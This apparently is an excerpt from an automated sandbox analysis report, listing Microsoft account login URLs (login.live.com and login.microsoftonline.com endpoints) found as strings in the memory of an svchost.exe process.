                  Source: svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502rise
                  Source: svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600gin.
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601/log
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf215
                  Source: svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srferSs
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfo.srf
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getr
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000008.00000002.2606257745.000001E11B937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfe/dev
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfsoftonline.
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfate.srf
                  Source: svchost.exe, 00000008.00000002.2605455938.000001E11B02F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srferpriseDe
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601rover
                  Source: svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603nUp
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000008.00000003.1384151397.000001E11B96B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfteService
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLo
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806003
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603ogin.live.c
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604login.live.
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604roveSession
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=8060506
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=8060608
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607cfg:GetAppD
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384073807.000001E11B957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608/cfg:CXHSig
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=H
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000003.1383599992.000001E11B92C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383811069.000001E11B95A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cpificates
                  Source: svchost.exe, 00000008.00000003.1383839850.000001E11B952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384319759.000001E11B956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383599992.000001E11B929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605(
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfrf
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605455938.000001E11B02F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfws
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383727399.000001E11B04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 00000008.00000002.2606537340.000001E11BE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605859392.000001E11B0C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARS
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARSEnte
                  Source: svchost.exe, 00000008.00000003.1384050065.000001E11B93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384099647.000001E11B940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605538080.000001E11B05E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf(
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455330524.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384032583.000001E11B94D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1384117488.000001E11B963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2605934744.000001E11B102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1421900547.000001E11B102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1383787727.000001E11B910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 00000008.00000002.2605506733.000001E11B03F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
